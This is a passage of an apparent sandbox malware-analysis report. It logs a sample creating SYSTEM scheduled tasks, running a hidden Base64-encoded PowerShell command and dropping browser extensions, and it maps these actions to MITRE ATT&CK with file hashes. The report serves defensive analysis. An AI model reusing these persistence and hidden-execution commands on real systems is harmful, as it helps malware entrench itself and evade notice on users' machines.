- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "OwQWslRjOgHVMZf"
  2⤵
  PID:2236
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OwQWslRjOgHVMZf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1972
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "MwAwyZfakrhXVJ" /F /xml "C:\Program Files (x86)\bcDGOSnszpTU2\veuUxjg.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:3148
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "UpVguSTkAZKwI2" /F /xml "C:\ProgramData\HHFPPRMXrrQnklVB\MHEaJqE.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KZmDJfLQyasmMYLCR2" /F /xml "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\WhNqDlw.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:5096
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KhAZksiYHkbAYZvhNlA2" /F /xml "C:\Program Files (x86)\uulhOemmgIOXC\PMqJwzi.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 2564
  2⤵
  - Program crash
  PID:3696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2800

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3300 -ip 3300
1⤵
PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indirect Command Execution

T1202

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\YRaAzzcUU\ccZwkaq.xml

Filesize
2KB

MD5
a08aa7f2f300d21ed7c82c8f45ae05e7

SHA1
15ed963f3f9f2d3da0d1da6e893bac9cec8ad88e

SHA256
4229b5c6758d17a57d9c40e3d60eb1cd9e60c65b643638e7e23d564ac87e435e

SHA512
3951714e1fdc43a9a2e6e0d662ae7b4200b138d351bd34bcaf08dc3c657248c05717fd9dc5ea850e3e904eac6b581178bed373f7ee6b31cf46169ce8ec43d23f

Download Submit
C:\Program Files (x86)\bcDGOSnszpTU2\veuUxjg.xml

Filesize
2KB

MD5
f05c7e8d08b2c38b8ecce485e8711cee

SHA1
7260f6456e9d36fcf8432d702347738517ecfa5d

SHA256
a5566b6d54c408a68bfe46ad61943202baf8ff296c1a6c634a7aaa23ecd5a7f1

SHA512
10bc9fa8ad9eaf1e1307d920e7f187468ad3a8c6f21b7067e7abe0a31ff82eaddda24643097a0033d25436b49a2af68a69891e4056600c170f7ab04cbd88685d

Download Submit
C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\WhNqDlw.xml

Filesize
2KB

MD5
e10357ff91fd99b90252101045831ea5

SHA1
130a1de2311d585156bde204e55d97522c3e3d8a

SHA256
96ca566f35367767e5e47e4cca99ae26ae9f09e9510ca885b53883829ed41d63

SHA512
08770642374c0b7404ac28e0b0903587957c79158df51da802c193014e5ab8030e0bc0badbf25ce1beedcb73d60821f39801a53f718d4612145aa5c529cb2e2f

Download Submit
C:\Program Files (x86)\uulhOemmgIOXC\PMqJwzi.xml

Filesize
2KB

MD5
573ab3a0047471f61f9d5ed6ff9e8bbc

SHA1
9716bf17cd0dcaae3d0a2050e5708ffbd0ce21d1

SHA256
4788028f57e096bef1b8a12008547fe4675f255f6b9eae0c989fe082570fb249

SHA512
f85034e6a9d8bbe12c1f78e07769961f4b62a93c3a4e66ef1a74bc9852140da799eda8dc1b18ae471d30779d1edb8eeb00c0584ecebfe3bac480e04c6f2de71a

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{7A64B70D-E788-4CA6-8846-D267851C786F}.xpi

Filesize
644KB

MD5
a76e4ccaf764b009c5e7b8c37ede803c

SHA1
f18cb5e5a993a1f51c012057ccd1b1ec7bdde6d5

SHA256
747dff2b29dd274acfea73767b4ab30dc39ba07c0782d9c0774e4bdbbff37bfd

SHA512
ccb679c96dd778da126667eb4de91461c94f893eb156b459988049b0bc2c9cb89ae9179cecde5751aec30c1c2c6448ac7b3f2fb41c689c3414bf7f3e01fe12f2

Download Submit
C:\ProgramData\HHFPPRMXrrQnklVB\MHEaJqE.xml

Filesize
2KB

MD5
b2b39e8fa3d0491b76ebd507e6e2d276

SHA1
2ebbcbed0bd05d047fa72660584f05008929b092

SHA256
14ed73922d82ba78596248870a59d3be48c6101ab31425f56d925d7c86e16fef

SHA512
b8e28fda6230d54acc066b1e292c56651403092f87baa375dc3300fcafb2c9332357510a5a20279ac0f41b1d82ca573df947e6ea7164612a698ae0975731dbd6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eggkmbghbmjmbdjloifaklghfiecjbnk\1.1_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eggkmbghbmjmbdjloifaklghfiecjbnk\1.1_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\dljmggfdhmpacdjfaalojehcpakajlla\1.1_0\_locales\es\messages.json

Filesize
186B

MD5
a14d4b287e82b0c724252d7060b6d9e9

SHA1
da9d3da2df385d48f607445803f5817f635cc52d

SHA256
1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

SHA512
1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
b495bda76f5f1467ec61f0b2c6539c09

SHA1
84dc6daa40508fc81f5d41a5f9fc8088bcb02d42

SHA256
9dff5bae4117f7a714f743dcb0a2e65167963f6e288bf9cae2466eafd2b4d137

SHA512
313dd6ea09b636677e7bb5d20435c7ded9ff631b44e3f15d05b3f6df2f1ac3b05a0981fa256cdf2a5fe18910424f78998674f7fa3b96ef0e2266010886e6f17b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
7f26eb9bb8c716b78ac70041c8e3b212

SHA1
60741250e2e0e20285b8860c98d7021df0bd3394

SHA256
8582163c8d87016595f9a54bd504bc0e755f71355cb3321bd134007ffc2729b6

SHA512
bcb24e0145f6d4eed2518122173a026b57e0230d8310e88e634e001226e21f78dd772ad3d1215a36959c99796f4ca9564d4bc2ceaa66bf4ed8d317cd711d4ba8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
4c61ebe5b1d1844104ec1aa51e563d9a

SHA1
f108ce277a01713b293011b88851f6f8c8326b62

SHA256
516f10753fc91d23828a8fd937256f30d1909fc7fa7f1865b2df1d28548afa0f

SHA512
170d889f16b01f509dac3a2200ced7b317e882de1df9d22f6acc43521233dbf43a276d8412427b8733a1c6f3f9a1294b27df8ae682dd7ab2d893436107b282bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdw30s0t.tvv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\prefs.js

Filesize
12KB

MD5
b3d13a895bd09cf37dd95103d662105d

SHA1
cd032158ed8df366fc820793fdcff6e5d7183aff

SHA256
458351aef56c7a9026f8208ea8fc3108c6f075cea69ad2334f0343c6edc0c72b

SHA512
74cb99775fcf2b7ec05ef9aeca8e3c44b36fbe3597ad067561f8ac53881e1af053bd5a9450b0363eff6814e9b3e742c89f8db3cd04fa41507aca9d665e8f2848

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Filesize
7KB

MD5
d54d6acd36ab8a22216d54a96d4baa9f

SHA1
15ee6cbe89c80c9f370ade5f757c2cf7c28b7ddd

SHA256
4a4349b072da1ca95408a39bf2621623c2659864de7996a16397088c263f10ec

SHA512
d1d581ae6aff98ae06ad7f17f3eeff7b071babc7b705104f48a57e30003430bbe1bf235609dafe5534a869684a1bec3065b739ea4785daf77deef888f80bc00f

Download Submit
memory/2012-57-0x0000022F35F30000-0x0000022F35F52000-memory.dmp

Filesize
136KB

Download
memory/2484-42-0x0000000005800000-0x0000000005B54000-memory.dmp

Filesize
3.3MB

Download
memory/2484-53-0x0000000006000000-0x000000000604C000-memory.dmp

Filesize
304KB

Download
memory/3300-123-0x0000000004720000-0x0000000004782000-memory.dmp

Filesize
392KB

Download
memory/3300-0-0x00000000007F0000-0x0000000000E9D000-memory.dmp

Filesize
6.7MB

Download
memory/3300-80-0x00000000040D0000-0x0000000004155000-memory.dmp

Filesize
532KB

Download
memory/3300-24-0x0000000010000000-0x00000000105D4000-memory.dmp

Filesize
5.8MB

Download
memory/3300-70-0x00000000007F0000-0x0000000000E9D000-memory.dmp

Filesize
6.7MB

Download
memory/4940-40-0x0000000006740000-0x000000000678C000-memory.dmp

Filesize
304KB

Download
memory/4940-38-0x0000000006140000-0x0000000006494000-memory.dmp

Filesize
3.3MB

Download
memory/4976-21-0x00000000075C0000-0x0000000007B64000-memory.dmp

Filesize
5.6MB

Download
memory/4976-20-0x0000000006500000-0x0000000006522000-memory.dmp

Filesize
136KB

Download
memory/4976-18-0x0000000006F70000-0x0000000007006000-memory.dmp

Filesize
600KB

Download
memory/4976-19-0x0000000006480000-0x000000000649A000-memory.dmp

Filesize
104KB

Download
memory/4976-17-0x0000000005FE0000-0x000000000602C000-memory.dmp

Filesize
304KB

Download
memory/4976-16-0x0000000005F90000-0x0000000005FAE000-memory.dmp

Filesize
120KB

Download
memory/4976-15-0x0000000005AD0000-0x0000000005E24000-memory.dmp

Filesize
3.3MB

Download
memory/4976-5-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/4976-4-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/4976-3-0x0000000005100000-0x0000000005122000-memory.dmp

Filesize
136KB

Download
memory/4976-2-0x0000000005290000-0x00000000058B8000-memory.dmp

Filesize
6.2MB

Download
memory/4976-1-0x0000000002690000-0x00000000026C6000-memory.dmp

Filesize
216KB

Download